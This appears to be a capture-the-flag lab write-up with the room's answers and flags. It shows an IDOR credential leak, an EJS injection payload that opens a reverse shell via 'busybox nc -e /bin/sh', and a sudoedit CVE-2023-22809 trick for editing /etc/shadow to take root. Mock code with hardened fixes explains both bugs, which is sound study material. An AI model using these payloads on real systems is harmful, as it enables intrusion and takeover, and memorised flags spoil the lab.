Q: What's Tyrell Wellick's phone number?
A: 842-029-5701
- nmap scan shows ports 22 and 80 are open
- navigating to port 80 in the browser shows the domain cyprusbank.thm (add it to /etc/hosts)
- cyprusbank.thm didn't show much, so a gobuster vhost scan was run and found the subdomain admin.cyprusbank.thm (add it to /etc/hosts as well)
- the given creds worked there:
Olivia Cortez:olivi8
- navigate to "messages"; the URL is http://admin.cyprusbank.thm/messages/?c=5. Tried lowering the parameter 'c' (the id is not access-checked, i.e. an IDOR), and at 0 it showed another user's credentials:
Gayle Bev:p~]P@5!6;rs558:q
- logged in as Gayle Bev; the phone numbers can be seen there.
Q: User flag?
A: THM{4lways_upd4te_uR_d3p3nd3nc!3s}
- after logging in as Gayle Bev, the 'settings' tab on the site becomes accessible.
- played a bit with the request in Burp Suite Repeater; it doesn't actually change the user's password, so I tried deleting the 'password' parameter, and the response revealed that the app renders EJS (Embedded JavaScript) templates.
- via Google, found the EJS render-options injection ("SSTI" through settings[view options], the same bug class as CVE-2022-29078). The request body looked like this (had to use BusyBox since my nc and the target's nc were different versions and without it I couldn't execute commands): name=1&settings[view options][client]=true&settings[view options][escapeFunction]=1;return global.process.mainModule.constructor._load('child_process').execSync('busybox nc 1234 -e /bin/sh');
- this gave a shell as user 'web', which had the flag in its home dir.
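Added example (not part of the original writeup, and not ejs's own code): a small mock of the two EJS behaviours that make the payload above work, with the vulnerable render path beside a hardened controller. The function names (compileTemplate, renderVulnerable, renderHardened) and the request bodies are made up for this illustration; the payload string is a harmless stand-in for the execSync('busybox nc ...') one.

```javascript
// Model of the EJS render-options injection used above (mock code written for
// this writeup, not ejs's source; function names are made up). It reproduces
// the two behaviours that make the payload work:
//  1. ejs renderFile() copies data.settings['view options'] into its compile
//     options, and Express hands it whatever the controller passes to
//     res.render(), here the raw request body.
//  2. with `client: true` ejs prepends `escapeFn = escapeFn || <escapeFn.toString()>;`
//     to the generated function body and returns the raw function, which the
//     renderer then calls with only the data argument. If escapeFunction is a
//     string, String#toString returns it verbatim, so it is compiled as code.

// Self-contained so that escapeXML.toString() yields working source.
function escapeXML(markup) {
  return String(markup).replace(/[&<>"']/g, function (c) {
    return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c];
  });
}

// Toy template compiler: only `<%= expr %>` is supported.
function compileTemplate(template, opts = {}) {
  const escapeFn = opts.escapeFunction || escapeXML;
  let src = 'var __output = "";\n';
  src += 'function __append(s) { if (s !== undefined && s !== null) __output += s; }\n';
  const re = /<%=([\s\S]+?)%>/g;
  let last = 0;
  let m;
  while ((m = re.exec(template)) !== null) {
    src += `__append(${JSON.stringify(template.slice(last, m.index))});\n`;
    src += `__append(escapeFn(${m[1].trim()}));\n`;
    last = re.lastIndex;
  }
  src += `__append(${JSON.stringify(template.slice(last))});\n`;
  src += 'return __output;\n';
  if (opts.client) {
    // The injection point: a string-valued escapeFunction lands here as source.
    src = 'escapeFn = escapeFn || ' + escapeFn.toString() + ';\n' + src;
  }
  const fn = new Function('locals, escapeFn', src);
  // Non-client mode wraps fn so the real escape function is always supplied;
  // client mode returns fn itself, so escapeFn is undefined when called with data only.
  return opts.client ? fn : (locals) => fn(locals, escapeFn);
}

// Vulnerable path, mirroring renderFile(): view options are taken from the data.
function renderVulnerable(template, data) {
  const opts = {};
  const viewOpts = data.settings && data.settings['view options'];
  if (viewOpts) Object.assign(opts, viewOpts);
  return compileTemplate(template, opts)(data);
}

// Hardened controller: build the view model from an allowlist instead of
// passing req.body through, so `settings` never reaches the engine.
function renderHardened(template, body) {
  const viewModel = { name: typeof body.name === 'string' ? body.name : '' };
  return compileTemplate(template, {})(viewModel);
}

const TEMPLATE = 'Hello <%= locals.name %>!';

// Constructed request bodies, as a qs-style parser would produce them from
//   name=<b>Bob</b>
//   name=1&settings[view options][client]=true&settings[view options][escapeFunction]=1;return ...
const benignBody = { name: '<b>Bob</b>' };
const maliciousBody = {
  name: '1',
  settings: {
    'view options': {
      client: 'true',
      // Harmless stand-in for the writeup's execSync('busybox nc ...') payload.
      escapeFunction: '1;return "INJECTED: platform=" + process.platform',
    },
  },
};

console.log(renderVulnerable(TEMPLATE, benignBody));    // escaped, as intended
console.log(renderVulnerable(TEMPLATE, maliciousBody)); // attacker code ran
console.log(renderHardened(TEMPLATE, maliciousBody));   // settings ignored
```

The hardening is on the application side: never pass the request body straight into res.render(), and keep ejs updated (the flag's hint). Note that a qs-style parser turns `settings[view options][client]=true` into a nested object with the string 'true', which is all the truthy check needs.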
Q: root flag?
A: THM{4nd_uR_p4ck4g3s}
- upgraded the shell via python3 and stty raw...
- sudo -l revealed the user can run this without a password:
sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
- searched for an exploit for sudoedit 1.9.12p1 and found this useful (CVE-2023-22809, affects sudo 1.8.0 through 1.9.12p1):
https://www.vicarius.io/vsociety/posts/cve-2023-22809-sudoedit-bypass-analysis
- export EDITOR="nano -- /etc/shadow" (sudoedit treats the file after the smuggled '--' as one more file to edit)
- (on my kali) openssl passwd -6 to generate a SHA-512 crypt hash for the new password
- run "sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm"; nano opens /etc/shadow as well
- replaced root's hash with the generated one and did 'su root' (with my new pass)
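Added example (not part of the original writeup, and not sudo's code): a mock of the argument handling behind CVE-2023-22809, showing why EDITOR="nano -- /etc/shadow" adds a file the sudoers rule never allowed, next to the post-fix behaviour. The function names and the inputs are made up for this illustration; the permitted file and the EDITOR value are the ones used above.

```javascript
// Model of CVE-2023-22809 (sudoedit <= 1.9.12p1), mock code written for this
// writeup, not sudo's source; function names are made up. The real sudoers
// policy takes the editor from SUDO_EDITOR, VISUAL or EDITOR, splits it on
// whitespace, and appends `--` followed by the files the rule permits; the
// vulnerable front end then treats everything after the *first* `--` as the
// files to edit, so a `--` smuggled in through the editor variable adds files
// the sudoers rule never allowed.

function splitEditor(editorEnv) {
  return editorEnv.trim().split(/\s+/); // simplification: no quote handling
}

// Vulnerable model (<= 1.9.12p1): the file list is recovered by scanning argv
// for the first '--'; the policy's own '--' then shows up as a bogus file name.
function sudoeditVulnerable(editorEnv, permittedFiles) {
  const argv = [...splitEditor(editorEnv), '--', ...permittedFiles];
  const sep = argv.indexOf('--');
  return { editor: argv.slice(0, sep), filesOpened: argv.slice(sep + 1) };
}

// Fixed model (1.9.12p2 and later): the policy refuses an editor argument that
// is exactly '--', and the front end uses the file count the policy reports
// instead of searching argv.
function sudoeditFixed(editorEnv, permittedFiles) {
  const editor = splitEditor(editorEnv);
  if (editor.slice(1).includes('--')) {
    throw new Error('sudoedit: editor arguments may not contain "--"');
  }
  const argv = [...editor, '--', ...permittedFiles];
  const nfiles = permittedFiles.length;
  return { editor, filesOpened: argv.slice(argv.length - nfiles) };
}

// Constructed inputs taken from the writeup's sudoers rule and EDITOR value.
const PERMITTED = ['/etc/nginx/sites-available/admin.cyprusbank.thm'];
const EVIL_EDITOR = 'nano -- /etc/shadow';

console.log(sudoeditVulnerable(EVIL_EDITOR, PERMITTED).filesOpened); // includes /etc/shadow
try {
  sudoeditFixed(EVIL_EDITOR, PERMITTED);
} catch (e) {
  console.log(e.message); // rejected
}
```

The check a practitioner wants on a target is simply `sudoedit -V` (or `sudo -V`) against the affected range 1.8.0 to 1.9.12p1; the edit-only sudoers rule is otherwise a sensible least-privilege grant, which is exactly why this parsing bug matters.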